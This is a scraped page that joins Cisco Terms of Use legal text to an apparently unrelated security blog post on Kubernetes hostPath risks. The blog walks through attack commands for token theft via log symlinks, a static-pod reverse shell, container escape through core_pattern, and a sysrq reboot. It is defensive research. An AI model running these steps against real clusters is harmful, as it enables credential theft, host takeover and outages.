These Cisco Terms of Use (this “Agreement”) between You and Cisco cover Your use of the Software and Cloud Services (“Cisco Technology”) obtained through this site. The Cisco Technology is intended for use by business users. Definitions of capitalized terms are in Section 11.
You agree to be bound by the terms of this Agreement through (a) Your download, installation, or use of the Cisco Technology; or (b) Your express agreement to this Agreement. If You do not have authority to enter into this Agreement or You do not agree with its terms, do not use the Cisco Technology.
Section 2. Using Cisco Technology
2.1 License and Right to Use. Cisco grants You, for Your direct benefit during the Usage Term and for the full scope of Your Entitlement under this Agreement, a non-exclusive, non-transferable (except with respect to Software as permitted under the Cisco Software Transfer and Re-Use Policy) (a) license to use the Software; and (b) right to use the Cloud Services (collectively, the “Usage Rights”).
2.2 Use by Third Parties. You may permit Authorized Third Parties to exercise the Usage Rights on Your behalf, provided that You are responsible for (a) ensuring that such Authorized Third Parties comply with this Agreement; and (b) any breach of this Agreement by such Authorized Third Parties.
2.3 Free Service. Cisco is making this Cisco Technology available to You without charge, up to certain capacity limits as described in Section 10 below, and subject to the terms of this Agreement. You agree that Cisco, in its sole discretion and for any or no reason, may terminate Your Usage Rights (or any part thereof) and that any termination may be without prior notice and without liability to Cisco. Cisco may, for example, suspend or terminate Your Usage Rights if (i) Cisco has reason to believe that You engaged in any fraudulent behaviour as it relates to the Cloud Services, or (ii) You use Cisco Technology beyond Your Entitlement. You are solely responsible for exporting Your customer data from the Cisco Technology prior to termination, and, except as required by law, Cisco will provide You a reasonable opportunity to retrieve such data.
2.4 Upgrades or Additional Copies of Software. You may only use Upgrades or additional copies of the Software beyond Your Entitlement if You have (a) acquired those rights under a support agreement covering the applicable Software; or (b) You have purchased the right to use Upgrades or additional copies separately.
2.5 Interoperability of Software. If required by law and upon Your request, Cisco will provide You with the information needed to achieve interoperability between the Software and another independently created program, provided You agree to any additional terms reasonably required by Cisco. You will treat such information as Confidential Information.
Section 3. Additional Conditions of Use
3.1 Cisco Technology Generally. Unless expressly agreed by Cisco, You may not (a) transfer, sell, sublicense, monetize, or make the functionality of any Cisco Technology available to any third party; (b) use the Software on second hand or refurbished Cisco equipment not authorized by Cisco, or use Software that is licensed for a specific device on a different device (except as permitted under Cisco’s Software License Portability Policy); (c) remove, modify, or conceal any product identification, copyright, proprietary, intellectual property notices or other marks; (d) reverse engineer, decompile, decrypt, disassemble, modify, or make derivative works of the Cisco Technology; or (e) use Cisco Content other than as part of Your permitted use of the Cisco Technology.
3.2 Cloud Services. You will not intentionally (a) interfere with other users’ access to, or use of, the Cloud Service, or with its security; (b) facilitate the attack or disruption of the Cloud Service, including a denial of service attack, unauthorized access, penetration testing, crawling, or distribution of malware (including viruses, trojan horses, worms, time bombs, spyware, adware, and cancelbots); (c) cause an unusual spike or increase in Your use of the Cloud Service that negatively impacts the Cloud Service’s operation; or (d) submit any information that is not contemplated in the applicable Documentation.
3.3 Evolving Cisco Technology. Cisco may: (a) enhance or modify the features, functionality, and capacity limits of this Cisco Technology at any time, in its sole discretion, without liability; and (b) perform scheduled maintenance of the infrastructure and software used to provide the Cloud Service, during which time You may experience some disruption to that Cloud Service. Whenever reasonably practicable, Cisco will provide You with advance notice of such maintenance. You acknowledge that, from time to time, Cisco may need to perform emergency maintenance without providing You advance notice, during which time Cisco may temporarily suspend Your access to, and use of, the Cloud Service.
Cisco reserves the right (a) to end the life of this Cisco Technology, including component functionality, (“EOL”), and/or (b) to incorporate all or some of the features and functionality of this Cisco Technology into a Cisco paid offer at any time, in its sole discretion, and without liability (“Cisco Offering”). Any new Cisco Offering will be subject to its own terms and conditions.
3.4 Protecting Account Access. You will keep all account information up to date, use reasonable means to protect Your account information, passwords and other login credentials, and promptly notify Cisco of any known or suspected unauthorized use of or access to Your account.
3.5 Use with Third-Party Products. If You use the Cisco Technology together with third-party products, such use is at Your risk. You are responsible for complying with any third-party provider terms, including its privacy policy. Cisco does not provide support or guarantee ongoing integration support for products that are not a native part of the Cisco Technology.
3.6 Open Source Software. Open source software not owned by Cisco is subject to separate license terms as set out at www.cisco.com/go/opensource. The applicable open source software licences will not materially or adversely affect Your ability to exercise Usage Rights in applicable Cisco Technology.
Section 4. Confidential Information and Use of Data
4.1 Confidentiality. Recipient will hold in confidence and use no less than reasonable care to avoid disclosure of any Confidential Information to any third party, except for its employees, affiliates, and contractors who have a need to know (“Permitted Recipients”). Recipient: (a) must ensure that its Permitted Recipients are subject to written confidentiality obligations no less restrictive than the Recipient’s obligations under this Agreement, and (b) is liable for any breach of this Section by its Permitted Recipients. Such nondisclosure obligations will not apply to information that: (i) is known by Recipient without confidentiality obligations; (ii) is or has become public knowledge through no fault of Recipient; or (iii) is independently developed by Recipient. Recipient may disclose Discloser’s Confidential Information if required under a regulation, law or court order provided that Recipient provides prior notice to Discloser (to the extent legally permissible) and reasonably cooperates, at Discloser’s expense, regarding protective actions pursued by Discloser. Upon the reasonable request of Discloser, Recipient will either return, delete or destroy all Confidential Information of Discloser and certify the same.
4.2 How We Use Data. Cisco will access, process and use data in connection with Your use of the Cisco Technology in accordance with applicable privacy and data protection laws. For further detail, please visit Cisco’s Security and Trust Center.
4.3 Notice and Consent. To the extent Your use of the Cisco Technology requires it, You are responsible for providing notice to, and obtaining consents from, individuals regarding the collection, processing, transfer and storage of their data through Your use of the Cisco Technology.
Section 5. Ownership
Except where agreed in writing, nothing in this Agreement transfers ownership in, or grants any license to, any intellectual property rights. You retain any ownership of Your content and Cisco retains ownership of the Cisco Technology and Cisco Content. You acknowledge and agree that any questions, comments, suggestions, ideas, feedback or other information about this Cisco Technology provided by You to Cisco (“Feedback”) are non-confidential and Cisco may use any Feedback You provide in connection with Your use of the Cisco Technology as part of its business operations without acknowledgment or compensation to You.
Section 6. Warranties and Representations
To the extent allowed by applicable law, Cisco expressly disclaims all warranties and conditions of any kind, express or implied, including without limitation any warranty, condition or other implied term as to merchantability, fitness for a particular purpose or non-infringement, or that the Cisco Technology will be secure, uninterrupted or error free. If You are a consumer, You may have legal rights in Your country of residence that prohibit the limitations set out in this Section from applying to You, and, where prohibited, they will not apply
Section 7. Liability
Neither party will be liable for indirect, incidental, exemplary, special, or consequential damages; loss or corruption of data or interruption or loss of business; or loss of revenues, profits, goodwill, or anticipated sales or savings. The maximum aggregate liability of each party under this Agreement is limited to $5,000 USD. These limitations of liability do NOT apply to liability arising from (a) Your breach of Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services) or 9.7 (Export). These limitations of liability apply whether the claims are in warranty, contract, tort (including negligence), infringement, or otherwise, even if either party has been advised of the possibility of such damages. Nothing in this Agreement limits or excludes any liability that cannot be limited or excluded under applicable law. These limitations of liability are cumulative and not per incident.
Section 8. Termination and Suspension
8.1 Suspension. Cisco may immediately suspend Your Usage Rights if You breach Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services) or 9.7 (Export).
8.2 Termination. Cisco, in its sole discretion and for any or no reason, may terminate Your access to this Cisco Technology or any part thereof and any termination may be without prior notice and without liability to Cisco. Cisco may, for example, suspend or terminate Your access immediately if You breach Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services), or 9.7 (Export). Upon termination of this Agreement, You must stop using the Cisco Technology and destroy any copies of Software and Confidential Information within Your control.
Section 9. General Provisions
9.1 Survival. Sections 4 (Confidential Information and Use of Data), 5 (Ownership), 7 (Liability), 8 (Termination and Suspension), and 9 (General Provisions) survive termination or expiration of this Agreement.
9.2 Third-Party Beneficiaries. This Agreement does not grant any right or cause of action to any third party.
9.3 Assignment and Subcontracting. Except as set out below, neither party may assign or novate this Agreement in whole or in part without the other party’s express written consent. Cisco may (a) by written notice to You, assign or novate this Agreement in whole or in part to an Affiliate of Cisco, or otherwise as part of a sale or transfer of any part of its business; or (b) subcontract any performance associated with the Cisco Technology to third parties, provided that such subcontract does not relieve Cisco of any of its obligations under this Agreement.
9.4 U.S. Government End Users. The Software, Cloud Services and Documentation are deemed to be “commercial computer software” and “commercial computer software documentation” pursuant to FAR 12.212 and DFARS 227.7202. All U.S. Government end users acquire the Cisco Technology and Documentation with only those rights set forth in this Agreement. Any provisions that are inconsistent with federal procurement regulations are not enforceable against the U.S. Government
9.5 Modifications to this Agreement. Cisco may change this Agreement or any of its components by updating it on Cisco.com and/or the Documentation page, which can be found at https://community.cisco.com/. Cisco will exercise commercially reasonable efforts to provide notice of any material changes to this Agreement, and within three (3) business days of posting changes to this Agreement, they will be binding. If you do not agree with the changes, you must discontinue using the Cisco Technology at that time. If you continue using the Cisco Technology after that time, you will be deemed to have accepted the changes to this Agreement.
9.6 Compliance with Laws. Each party will comply with all laws and regulations applicable to their respective obligations under this Agreement. Cisco may restrict the availability of the Cisco Technology in any particular location or modify or discontinue features to comply with applicable laws and regulations.
If You use the Cisco Technology in a location with local laws requiring a designated entity to be responsible for collection of data about individual end users and transfer of data outside of that jurisdiction (e.g., Russia and China), You acknowledge that You are the entity responsible for complying with such laws.
9.7 Export. Cisco’s Software, Cloud Services, products, technology, and services (collectively the “Cisco Products”) are subject to U.S. and local export control and sanctions laws. You acknowledge and agree to the applicability of and Your compliance with those laws, and You will not receive, use, transfer, export, or re-export any Cisco Products in a way that would cause Cisco to violate those laws. You also agree to obtain any required licenses or authorizations
9.8 Governing Law and Venue. This Agreement, and any disputes arising from it, will be governed exclusively by the applicable governing law below, based on Your primary place of business (or primary residence, if you are not a business) and without regard to conflicts of laws rules or the United Nations Convention on the International Sale of Goods. The courts located in the applicable venue below will have exclusive jurisdiction to adjudicate any dispute arising out of or relating to the Agreement or its formation, interpretation or enforcement. Each party hereby consents and submits to the exclusive jurisdiction of such courts. Regardless of the below governing law, either party may seek interim injunctive relief in any court of appropriate jurisdiction with respect to any alleged breach of Cisco’s intellectual property or proprietary rights
Your Primary Place of Business Governing Law Jurisdiction and Venue
Any location not specified below
| State of California, United States of America | Superior Court of California, County of Santa Clara and Federal Courts of the Northern District of California
| Australia | Laws of the State of New South Wales, Australia | State and Federal Courts of New South Wales |
| Canada | Province of Ontario, Canada | Courts of the Province of Ontario |
| China | Laws of the People’s Republic of China | Hong Kong International Arbitration Center |
| Europe (excluding Italy), Middle East, Africa, Asia (excluding Japan and China), Oceania (excluding Australia) | Laws of England | English Courts |
| Italy | Laws of Italy | Court of Milan |
| Japan | Laws of Japan | Tokyo District Court of Japan |
| United States, Latin America or the Caribbean | State of California, United States of America | Superior Court of California, County of Santa Clara and Federal Courts of the Northern District of California |
If You are a United States public sector agency or government institution located in the United States, the laws of the primary jurisdiction in which You are located will govern this Agreement and any disputes arising from it. For U.S. Federal Government users, this Agreement will be controlled and construed under the laws of the United States of America.
9.9 Notice. Any notice delivered by Cisco to You under this Agreement will be delivered on Cisco.com. Notices to Cisco should be sent to Cisco Systems, Inc., Office of General Counsel, 170 West Tasman Drive, San Jose, CA 95134.
9.10 Force Majeure. Neither party will be responsible for failure to perform its obligations due to an event or circumstances beyond its reasonable control.
9.11 No Waiver. Failure by either party to enforce any right under this Agreement will not waive that right.
9.12 Severability. If any portion of this Agreement is not enforceable, it will not affect any other terms.
9.13 Entire agreement. This Agreement is the complete agreement between the parties with respect to the subject matter of this Agreement and supersedes all prior or contemporaneous communications, understandings or agreements (whether written or oral).
9.14 Translations. Cisco may provide local language translations of this Agreement in some locations. You agree that those translations are provided for informational purposes only and if there is any inconsistency, the English version of this Agreement will prevail.
9.15 Order of Precedence. If there is any conflict between this Agreement and any Cisco policies expressly referenced in this Agreement, the order of precedence is: (a) this Agreement; then (b) any applicable Cisco policy expressly referenced in this Agreement.
9.16 Language Election for Purchasers in Quebec. You confirm Your Agreement that this Cisco Technology is currently provided in English only.
Section 10. Additional Terms
10.1 Restrictions on Use by Minor Children. This Cisco Technology is not intended for use by persons younger than the age of consent in their relevant jurisdiction (e.g.,13 years old in the United States under the US Children’s Online Privacy Protection Act of 1998, or 16 or 13 years old in the European Union as per Member State law) (“Minor Children”). Minor Children are not permitted to create an account and You will not authorize Minor Children to access the Cisco Technology.
10.2 Capacity Restrictions. Your right to access and use this Cisco Technology is currently limited to five (5) nodes dedicated to applications/microservices.
10.3 Limited Community Support. This Cisco Technology is provided on a free-of-charge basis, as-is, and without support. Cisco has no obligation to maintain, repair, or upgrade this Cloud Service and Cisco will not provide user support services in connection with this Cisco Technology. User can refer to self-service help materials that cover a range of topics or reach out to our community forum to engage in community support discussions on our Documentation page at https://community.cisco.com/. Cisco makes no representations about and has no liability for these community support resources. All use of these resources, and the advice and guidance therein, is at Your own risk.
10.4 No Competitive Analysis. By agreeing to these terms, You represent and warrant that you will not use this Cisco Technology or its Documentation to (a) copy ideas, features, functions, or graphics; (b) develop competing products or services; or (c) perform competitive analyses.
10.5 Beta Functionality. User acknowledges and agrees that all or some components or functionality of the Cisco Technology may be in beta stage and may not have been (and may not become) productized or commercialized. You acknowledge that Your use and evaluation of this Cisco Technology is at Your own risk.
Section 11. Definitions
“Affiliate” means any corporation or company that directly or indirectly controls, or is controlled by, or is under common control with the relevant party, where “control” means to: (a) own more than 50% of the relevant party; or (b) be able to direct the affairs of the relevant party through any lawful means (e.g., a contract that allows control).
“Authorized Third Parties” means Your Users, Your Affiliates, Your third-party service providers, and each of their respective Users, permitted to access and use the Cisco Technology on Your behalf as part of Your Entitlement.
“Cisco” “we” “our” or “us” means Cisco Systems, Inc. or its applicable Affiliate(s).
“Cisco Content” means any (a) content or data provided by Cisco to You as part of Your use of the Cisco Technology and (b) content or data that the Cisco Technology generates or derives in connection with Your use. Cisco Content includes geographic and domain information, rules, signatures, threat intelligence, and data feeds, and Cisco’s compilation of suspicious URLs.
“Cloud Service” means the Cisco hosted software-as-a-service offering or other Cisco cloud-enabled feature described in this Agreement. Cloud Services include applicable Documentation and may also include Software.
“Confidential Information” means non-public proprietary information of the disclosing party (“Discloser”) obtained by the receiving party (“Recipient”) in connection with this Agreement, which is (a) conspicuously marked as confidential or, if verbally disclosed, is summarized in writing to the Recipient within a reasonable time period after disclosure and marked as confidential; or (b) is information which by its nature should reasonably be considered confidential whether disclosed in writing or verbally.
“Delivery Date” means the date on which the Cloud Service is made available for Your use or, when Usage Rights in Software and Cloud Services are granted together, the earlier of the date Software is made available for download, or the date on which the Cloud Service is made available for Your use.
“Documentation” means the technical specifications and usage materials officially published by Cisco or available on https://community.cisco.com/ specifying the functionalities and capabilities of the applicable Cisco Technology.
“Entitlement” means the specific metrics, duration, and quantity of Cisco Technology that You acquire from Cisco under this Agreement.
“Software” means the Cisco computer programs including Upgrades, firmware and applicable Documentation.
“Upgrades” means all updates, upgrades, bug fixes, error corrections, enhancements and other modifications to the Software.
“Usage Term” means the period commencing on the Delivery Date and continuing until expiration or termination of the Entitlement, during which period You have the right to use the applicable Cisco Technology.
“User” means the individuals (including contractors or employees) permitted to access and use the Cisco Technology on Your behalf as part of Your Entitlement.
“You” means the individual or legal entity using the Cisco Technology.
NEW Cloud Security Academy Level up your skills with hands-on lessons. Get started
Walking the Risky Path: The Threat of hostPath to Your Kubernetes Cluster
Reem Rotenberg
Monday, Apr 1st, 2024
In this blog, we will shed light on hostPath potential risks, delving into the depths of risky hostPath use cases and how they can compromise the security of your cluster if not carefully managed.
In today's cloud technology landscape, Kubernetes is widely used to orchestrate containerized applications, enabling deployment, scaling, and management. Applications in a Kubernetes environment benefit from high availability and resource efficiency, making them ideal for cloud-native development. However, challenges with filesystem consistency due to the ephemeral nature of containers can lead to discrepancies when they are restarted or modified. This inconsistency can affect applications that rely on stable, persistent data, necessitating the use of additional storage solutions. One example of a native solution in Kubernetes is hostPath Storage Volume.
With the help of the hostPath functionality, a pod can access the storage components of the worker node by mounting a file or directory from the filesystem of the node where it is running.
While offering a convenient way of accessing the filesystem of the worker node, hostPath functionality can also open the door to serious security risks. In this blog we will shed light on these potential risks, delving into the depths of risky hostPath use cases and how they can compromise the security of your cluster if not carefully managed.
Background
The hostPath storage volume type is considered relatively common and even widely used by cloud providers to share data between worker nodes and their running pods.
In AKS, for instance, the ama-logs pod, used for collection of logs from containers, mounts it's entire node filesystem when choosing to enable container insights on a cluster.
Figure 1 shows entire root host path mounted to a container on the ‘ama-logs’ pod in AKS
How Does hostPath Work?
hostPath declared in the .spec.volumes in the pod’s specification. It then can be bound to the relevant containers in .spec.containers[*].volumeMounts.
The worker node watches for changes to the API server's Pods resource. When a pod with a hostPath declaration is deployed, the Kubelet node agent gets notified.
The worker node uses the watch mechanism to observe changes to the API server's Pods resources and gets notified when a pod that includes a hostPath declaration is deployed.
The Kubelet then inspects the Pod definition and instructs the container runtime to mount the required path specified in the pod’s specification from the node filesystem. The container runtime then starts the container with the relevant directories mounted.
Security Impact
Defining a hostPath without being careful and fully understanding the impact of the specific path can pose a security risk. Kubernetes provides the following warning in their documentation for when users apply hostPath:
Access to the host filesystem can expose privileged system credentials (such as for the kubelet) or privileged APIs (such as the container runtime socket), that can be used for container escape or to attack other parts of the cluster.
Pods with identical configuration (such as created from a PodTemplate) may behave differently on different nodes due to different files on the nodes.
To better explain it, we will demonstrate the security risk with five hostPath paths detailed below.
Attack Scenarios
In the following section, we will present five attack scenarios that take advantage of risky hostPath configurations. Each scenario will include required prerequisites, instructions for setting up a vulnerable environment, the potential impact, and a detailed walkthrough with complete instructions to simulate and exploit each use case.
/var/log directory mounted
Prerequisites
Ability to run commands on a running pod as root
Writeable /var/log host path directory mounted to a pod
GET RBAC permissions to pods/log sub-resource in the core API group
Optional: GET & LIST RBAC permissions to pods/log & nodes/log sub-resources in the core API group
Explanation
The purpose of the /var/log directory is simply to store log files. From the Kubernetes perspective, it is where the Pod log files for containers are stored on the nodes. An attacker can abuse this directory to create symbolic links to sensitive files on the host and make the Kubelet get it by using kubectl command or an API call. While it is possible to escape from a pod to the worker node in many ways, including reading ssh private keys, cracking /etc/shadow hashes, reading configuration files, and so forth. Here we will focus on the /var/lib/kubelet/pods directory which will be discussed further later in this blog.
Impact
In this scenario, we will demonstrate how an attacker can abuse writeable /var/log directory mounted to a pod to gain the service account tokens that stores in the /var/lib/kubelet/pods directory. Later we will explain how those tokens can be used by an attacker.
Kubernetes stores tokens for it’s service account in the /var/lib/kubelet/pods directory following this structure:
podUID, namespace, pod can be obtained from /var/log/pods directory
kube-api-access-{random suffix} random suffix generated from 5 alpha numeric characters from the following list: bcdfghjklmnpqrstvwxz2456789 (src)
It is therefore possible to assemble the entire path of the token using brute force technique.
We have developed an automated tool, written in Go, that can be deployed on a specified pod which mounts the /var/log hostPath directory. This tool can function using either the service account token from the pod on which it is running or a token supplied by the user. First, the tool lists all of the namespaces in the /var/log/pods directory in order to determine if the service account that is provided has the permissions necessary to read the logs in any of those namespaces. It then creates symlinks for all possible suffix combinations using a brute-force method to find service account tokens stored in the /var/lib/kubelet/pods directory on the host node.
For further information on how to use the tool, source code, and more, please see the link below:
Please note, the tool should not be used in production environments.
Figure 2 shows usage of k8s token hunter tool.
Disclaimer: The use of the code provided herein is intended solely for educational and security-testing purposes on systems where you have explicit authorization to conduct such activities. Misuse of this code to access, modify, or exploit systems without proper consent is strictly prohibited and may violate privacy laws, data protection statutes, and ethical standards. It is the user's responsibility to ensure lawful and ethical application of this tool. The creators and distributors of the code assume no liability for any unauthorized or improper use of the code, and are not responsible for any direct or indirect damages or legal repercussions that may arise from such misuse. Please use this code responsibly and ethically.
1. Accessing /etc/passwd content of the worker node
Get a shell on the running pod: kubectl exec -it -n hostpath-ns var-log-pod -- /bin/bash
# check permissions to read logs in the 'hostpath-ns' namespace
/usr/local/bin/kubectl auth can-i get pods --subresource=log --namespace=hostpath-ns
# locate directories associated with the 'hostpath-ns'
cd /host/var/log/pods/hostpath-ns_<pod_name>_<pod_uuid>/<container_name>/<log_file>.log
# create symlink of /etc/passwd file to the last log file in the current directory
ln -sf /etc/passwd ./<last_log_file>.log
Get the pod’s log content:
# use kubectl to get the pod's log
# set tail to the row number desired
kubectl logs -n hostpath-ns <pod_name> --tail=1
# with curl
curl -i -k -H "Authorization: Bearer $TOKEN" 'https://<cluster IP>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container_name>'
2. Accessing service account token stored on the worker node
Get a shell on the running pod: kubectl exec -it -n hostpath-ns var-log-pod -- /bin/bash
# check permissions to read logs in the 'hostpath-ns' namespace
/usr/local/bin/kubectl auth can-i get pods --subresource=log --namespace=hostpath-ns
# locate directories associated with the 'hostpath-ns'
cd /host/var/log/pods/hostpath-ns_<pod_name>_<pod_uuid>/<container_name>/<log_file>.log
# create symlink for pods found in the /var/log/pods with the following path
# use brute-force to find the 5 characters suffix
ln -sf /var/lib/kubelet/pods/<pod_uuid>/volumes/kubernetes.io~projected/kube-api-access-xxxxx/token ./<last_log_file>.log
Get the pod’s log content:
# use kubectl to get the pod's log
# set tail to the row number desired
kubectl logs -n hostpath-ns <pod_name> --tail=1
# with curl
curl -i -k -H "Authorization: Bearer $TOKEN" 'https://<cluster IP>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container_name>'
/etc/kubernetes/manifests directory mounted
Prerequisites
Ability to run commands on a running pod as root
Writeable /etc/kubernetes/manifests host path directory mounted to a pod
Explanation
The purpose of /etc/kubernetes/manifests directory is to store Static Pod manifests. Static Pods are pods that managed by the Kubelet directly. The main use for static pods according to the Kubernetes documentation is to run a self-hosted control plane. The Kubelet watches for changes to this directory, and instructs the container runtime to create/delete containers upon changes.
It is also worth mentioning that Static Pod spec cannot refer to some API objects such as ServiceAccount, ConfigMap, Secret, etc).
Impact
In this scenario, we will demonstrate how an attacker can abuse writeable /etc/kubernetes/manifests directory mounted to a pod to deploy pods on a worker node.
It is pretty simple to deploy static pods. Write static pod manifest into the /etc/kubernetes/manifests and the Kubelet will take care of the rest. A new static pod will be created and *mirror pod should appear on the Kubernetes API server.
Mirror pod, according to the Kuberneters documentation, is a pod object that the Kubelet uses to represent a static pod.
When the Kubelet finds a static pod in its configuration, it automatically tries to create a Pod object on the Kubernetes API server for it. This means that the pod will be visible on the API server, but cannot be controlled from there.
(For example, removing a mirror pod will not stop the Kubelet daemon from running it).
Since static pods are created and managed by the Kubelet, it possible for an attacker to evade and bypass detection and prevention mechanisms. For example, deploy a static pod in the kube-system namespace, evade API logging, and bypass admission controls.
We deployed static pods using this method on the three major managed Kubernetes cloud providers- AKS (Azure), GKE (Google) and EKS (Amazon Web Services). For AKS and GCP, static pods have been created by the Kubelet and mirror pods are presented on the API server.
However, for EKS, some changes to the Kubelet configuration file (/etc/kubernetes/kubelet/kubelet-config.json) are required as well as restarting the Kubelet service, so static pods can only be deployed on a node that has already been accessed. In this case, it can be mainly used for persistence. Additionally, it is worth noting that when static pods are deployed to the kube-system namespace on EKS, they are not mirrored on the API server, resulting in a more stealthy approach.
In the following simulation, we’ll use a running pod that has the /etc/kubernetes/manifests host path mounted on it to move laterally into the worker node.
Get a shell on the running pod: kubectl exec -it -n hostpath-ns manifests-pod -- /bin/bash
Find the manifests-pod pod’s IP address
Set up a netcat listener on port 9898 to catch the reverse shell from the static pod.
Write new static pod manifest file to /host/etc/kubernetes/manifests mounted directory.
Running nsenter command with --target 1 --all to enter the host namespaces or just chroot to the node mounted directory /host.
For debugging purposes, install crictl and observe the new created static pod from the node’s perspective: execute crictlcrictl ps command.
Figure 3 shows catching reverse shell from the evil static pod on the manifests-pod pod.
Mounted /var/run/containerd/containerd.sock socket (or other applicable container runtime sockets such as crio, docker, etc,.)
Optional: spec.hostNetwork set to true (in order to attach to a running container or exec commands on it)
Explanation
Containerd is a container runtime that is responsible for managing the lifecycle of containers in a host. In Kubernetes, it runs as a daemon on worker nodes. /run/containerd/containerd.sock is a UNIX domain socket that the containerd daemon uses for communication. A UNIX domain socket or IPC socket (inter-process communication socket) is a data communications endpoint for exchanging data between applications on the same host.
Impact
In this scenario, we’ll demonstrate how an attacker can abuse the containerd.sock socket mounted on a pod by interacting with the containerd daemon running on a worker node.
We’ll be using crictl to communicate with the conainerd.sock. Since the socket is already mounted, it is pretty straightforward. Just use crictl to stop running containers, execute commands, and gain sensitive information.
spec.hostNetwork set to true is required to execute commands or attach to a running container.
Figure 5 shows stopping running pod using stopp crictl command via the containerd.sock mounted.
Attack Simulation #2
From inside a running pod that has containerd.sock mounted and hostNetwork set to true, executing crictl ps command to list all the running containers on the worker node:
Figure 6 shows communication with the containerd daemon via the containerd.sock socket mounted to a Pod.
/var/lib/kubelet/pods directory mounted
Prerequisites
Ability to run commands on a running pod as root
Mounted /var/lib/kubelet/pods host path directory to a pod
Explanation
The /var/lib/kubelet/pods directory in Kubernetes is used to store data related to the pods running on that specific node, managed by the Kubelet service.
This directory includes:
Pod-specific directories: Each pod running on the node has its own unique directory within /var/lib/kubelet/pods. The directory name is the UUID of the pod.
Volume directories: Within each pod's directory, there are directories for each volume that is mounted for that pod. This includes persistent volumes, configmaps, secrets, and others.
Containers directories: There are also directories for each container's file system, where the container's file system layers are stored.
Impact
In this scenario, we’ll demonstrate how an attacker that has access to the /var/lib/kubelet/pods host path directory can potentially escalate its privileges and move laterally in the cluster.
As this directory contains secrets, it contains the tokens for the service accounts of each pod running on the host. An attacker can enumerate the tokens for service accounts stored in this directory and map their RBAC permissions. Additionally, an attacker will search for other secrets and configmaps that may expose sensitive information.
1. From inside a running Pod that has the /var/lib/kubelet/pods directory mount to it, cd into the different directories under /host/var/lib/kubelet/pods and extract the tokens and other sensitive information stored there.
2. Check the RBAC permissions for each service account:
3. Here we can see that we have found a token for the ‘gatekeeper-admin’ service account which existby default on AKS cluster. When inspecting its RBAC permissions, we discover that it has the get, list, and watch verbs granted for "*" resources on "*" api group, meaning access to all resources in all API groups.
4. By using the gatekeeper-admin service account token, it is possible to read secrets across all namespaces in the cluster.
Figure 7 shows access to sensitive information stored in /var/lib/kubelet/pods mounted on a running Pod.
Figure 8 shows gatekeeper’s RBAC permissions.
Figure 9 shows secret extracted stored in the kube-system namespace by using gatekeeper’s sa token.
/proc/sys/kernel/core_pattern file mounted
Prerequisites
Ability to run commands on a running pod as root
Writable /proc/sys/kernel/core_pattern host path file mounted to a pod
Explanation
The /proc directory is a Linux virtual file system that contains various files that provide access to kernel settings, kernel information, and may also allow modification of kernel variables through system calls.
/proc/sys/kernel/core_pattern is a file in the proc filesystem on Linux systems that specifies the pattern for the filename and location of core dump files. When a program terminates on certain signals (listed in appendix A), e.g., crashes, it produces a core dump file which stores the memory image of the process at the time of termination.
From the Linux core(5) manual: Piping core dumps to a program Since Linux 2.6.19, Linux supports an alternate syntax for the /proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the remainder of the line is interpreted as the command-line for a user-space program (or script) that is to be executed.
According to this, it is possible to trigger command execution by the worker node by editing the /proc/sys/kernel/core_pattern host file and causing a program to crash.
In this scenario, we’ll demonstrate how an attacker with write access to the /proc/sys/kernel/core_pattern host path file can breakout from the container into the worker node.
4. Create another file called ‘crash.go’ also under /tmp directory:
// crash.go
package main
import (
"fmt"
"os"
"os/signal"
"syscall"
)
func main() {
// Create a channel to receive signals
sigChan := make(chan os.Signal, 1)
// Notify the channel on SIGABRT
signal.Notify(sigChan, syscall.SIGABRT)
// Simulate work
go func() {
fmt.Println("Working...")
}()
// Block until a signal is received
sig := <-sigChan
fmt.Printf("Got signal: %v, aborting...\n", sig)
}
5. Compile /tmp/reverse.go and /tmp/crash.go:
go build /tmp/reverse.go
go build /tmp/crash.go
6. Find the OverlayFS path of the running container by executing:
overlay=`mount | sed -n 's/.*\perdir=\([^,]*\).*/\1/p'`
7. Edit the /proc/sys/kernel/core_pattern file, using pipe and a path to the reverse binary we created earlier:
8. Now, all it’s left is to execute a program that will crash and have a listener ready to catch the reverse shell:
sleep 5 && /tmp/crash &
nc -nlvp 9911
Figure 10 shows editing the /proc/sys/kernel/core_pattern host path file to execute a malicious binary when a program crashes.
/ directory mounted
When the entire file system is mounted with write permissions using hostPath, it is obvious that all the scenarios described above are also valid. However it includes more paths that could lead to security risks, which I did not write about. Some examples of risky hostPath are:
Mounting the /root host path directory gives the container access to sensitive files like /.ssh/authoriziaed_keys.
Mounting the /etc host path directory gives the container access to configuration files stored on the worker node.
Mounting the /proc and /sys could allow an attacker to modify kernel variables, access to sensitive data and potentially could lead to container escape. For example, mounting the /proc/sysrq-trigger file allows an attacker to reboot the host by simply writing to it.
# payload -> execute from a running pod that has the /proc/sysrq host path mounted to it.
echo b > /proc/sysrq-trigger # Reboots the host
/etc/kubernetes/pki directory contains private and public TLS encryption keys for the Kubelet and API server communication.
Conclusion
While Kubernetes has proven to be a powerful tool for container orchestration, it does have certain risks to consider. In this blog, we aimed to shed some light on the security risks the hostPath mount presents in a cluster. However, by understanding these risky paths and implementing security measures, organizations can effectively leverage the power of Kubernetes while minimizing potential threats.
Appendices
Appendix A - List of Termination Signals That Trigger Core File Dump
Signal
Standard
Action
Comment
SIGABRT
P1990
Core
Abort signal from abort(3)
SIGBUS
P2001
Core
Bus error (bad memory access)
SIGFPE
P1990
Core
Floating-point exception
SIGILL
P1990
Core
Illegal Instruction
SIGIOT
-
Core
IOT trap. A synonym for SIGABRT
SIGQUIT
P1990
Core
Quit from keyboard
SIGSEGV
P1990
Core
Invalid memory reference
SIGSYS
P2001
Core
Bad system call (SVr4); see also seccomp(2)
SIGTRAP
P2001
Core
Trace/breakpoint trap
SIGUNUSED
-
Core
Synonymous with SIGSYS
SIGXCPU
P2001
Core
CPU time limit exceeded (4.2BSD); see setrlimit(2)
SIGXFSZ
P2001
Core
File size limit exceeded (4.2BSD); see setrlimit(2)
List of termination signals that trigger core file dump in linux.
SIGN UP FREE
